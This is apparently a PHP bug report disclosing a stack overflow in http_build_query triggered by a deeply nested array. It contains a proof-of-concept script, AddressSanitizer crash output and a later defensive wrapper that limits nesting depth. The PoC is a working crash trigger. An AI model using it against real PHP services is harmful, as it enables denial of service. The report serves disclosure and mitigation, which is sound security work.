Stack overflow in http_build_query via deep structures #20583

Description

@012git012

The following code:

<?php
// PoC: Stack overflow in http_build_query via unbounded recursion
// Builds a deeply nested array and calls http_build_query() to force deep C recursion
// Expected: AddressSanitizer/stack overflow crash or segfault
ini_set('memory_limit', '-1');
$depth = isset($argv[1]) ? (int)$argv[1] : 50000; // adjust as needed
fwrite(STDERR, "[i] Building nested array to depth {$depth}\n");
$a = null;
for ($i = 0; $i < $depth; $i++) {
    $a = [$i => $a];
}
fwrite(STDERR, "[i] Starting http_build_query()...\n");
// Use a small prefix to exercise integer-index path; not required for crash
$q = http_build_query($a, 'p');
// If it somehow returns, print small confirmation
echo "len=" . strlen($q) . "\n";

Resulted in this output:

$ ./php cli.php
[i] Building nested array to depth 50000
[i] Starting http_build_query()...
AddressSanitizer:DEADLYSIGNAL
=================================================================
==850581==ERROR: AddressSanitizer: stack-overflow on address 0x7fff75560f08 (pc 0x7986730a9080 bp 0x7fff755617a0 sp 0x7fff75560f10 T0)
    #0 0x7986730a9080 in prctl ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1249
    #1 0x6110da2db0fe in zend_mmap_set_name /home/administrator/php/php-src/Zend/zend_mmap.h:40
    #2 0x6110da2db6cc in zend_mm_mmap /home/administrator/php/php-src/Zend/zend_alloc.c:562
    #3 0x6110da2dc035 in zend_mm_chunk_alloc_int /home/administrator/php/php-src/Zend/zend_alloc.c:743
    #4 0x6110da2dc288 in zend_mm_chunk_alloc /home/administrator/php/php-src/Zend/zend_alloc.c:810
    #5 0x6110da2dce37 in zend_mm_alloc_pages /home/administrator/php/php-src/Zend/zend_alloc.c:1051
    #6 0x6110da2dd4a5 in zend_mm_alloc_large_ex /home/administrator/php/php-src/Zend/zend_alloc.c:1121
    #7 0x6110da2dd58b in zend_mm_alloc_large /home/administrator/php/php-src/Zend/zend_alloc.c:1138
    #8 0x6110da2df223 in zend_mm_alloc_heap /home/administrator/php/php-src/Zend/zend_alloc.c:1498
    #9 0x6110da2e6016 in _emalloc /home/administrator/php/php-src/Zend/zend_alloc.c:2783
    #10 0x6110da6d6f09 in zend_string_alloc /home/administrator/php/php-src/Zend/zend_string.h:167
    #11 0x6110da6d9222 in zend_string_concat3 /home/administrator/php/php-src/Zend/zend_string.c:493
    #12 0x6110d9f9dbc7 in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:180
    #13 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    #14 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    #15 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    …
    #245 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189
    #246 0x6110d9f9debb in php_url_encode_hash_ex /home/administrator/php/php-src/ext/standard/http.c:189

SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1249 in prctl
==850581==ABORTING

Build configuration:

$ ./configure CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" LDFLAGS="-fsanitize=address" --enable-debug

Researcher: Nikita Sveshnikov (Positive Technologies)

PHP Version

PHP 8.6.0-dev (cli) (built: Nov 18 2025 10:57:54) (NTS DEBUG)
Copyright (c) The PHP Group
Zend Engine v4.6.0-dev, Copyright (c) Zend Technologies
    with Zend OPcache v8.6.0-dev, Copyright (c), by Zend Technologies

Operating System

Ubuntu 24.04.2 LTS
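The trace above shows php_url_encode_hash_ex calling itself once per nesting level, so the depth of attacker-controlled data directly sets the C stack depth. A defensive wrapper, added here as an example and not part of the report or of php-src, measures nesting depth with an explicit work stack (so the check itself cannot recurse) and rejects input deeper than a fixed limit before calling http_build_query(). The function names and the limit of 64 are assumptions made for this example.

```php
<?php
// Added example (not from the report or php-src): reject deeply nested input
// before http_build_query(), since php_url_encode_hash_ex recurses once per level.
// The function names and the limit of 64 are assumptions made for this example.

const MAX_QUERY_DEPTH = 64;

// Measure nesting depth with an explicit work stack instead of recursion, so the
// check itself cannot overflow the C stack on hostile input. Returns early as soon
// as the depth exceeds $limit, which also bounds self-referencing objects.
function nesting_depth(array|object $data, int $limit): int
{
    $stack = [[$data, 1]]; // pairs of [container, depth]
    $max = 1;
    while ($stack) {
        [$node, $depth] = array_pop($stack);
        $max = max($max, $depth);
        if ($max > $limit) {
            return $max;
        }
        $children = is_object($node) ? get_object_vars($node) : $node;
        foreach ($children as $child) {
            if (is_array($child) || is_object($child)) {
                $stack[] = [$child, $depth + 1];
            }
        }
    }
    return $max;
}

// Same signature as http_build_query(), but throws instead of recursing unboundedly.
function bounded_http_build_query(
    array|object $data, string $numeric_prefix = "",
    ?string $arg_separator = null, int $encoding_type = PHP_QUERY_RFC1738
): string {
    if (nesting_depth($data, MAX_QUERY_DEPTH) > MAX_QUERY_DEPTH) {
        throw new LengthException("query data nested deeper than " . MAX_QUERY_DEPTH . " levels");
    }
    return http_build_query($data, $numeric_prefix, $arg_separator, $encoding_type);
}

// Constructed inputs: a shallow array is encoded; a 1000-level chain (the same
// shape as the report's PoC, far above the limit) is rejected before encoding.
echo bounded_http_build_query(['a' => ['b' => 1]], 'p'), "\n";
$deep = null;
for ($i = 0; $i < 1000; $i++) { $deep = [$i => $deep]; }
try {
    bounded_http_build_query($deep, 'p');
} catch (LengthException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

The same pre-check applies to any untrusted structure that is later fed to a recursive encoder (JSON, serialization, query building); the limit should reflect the deepest structure the application legitimately produces.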
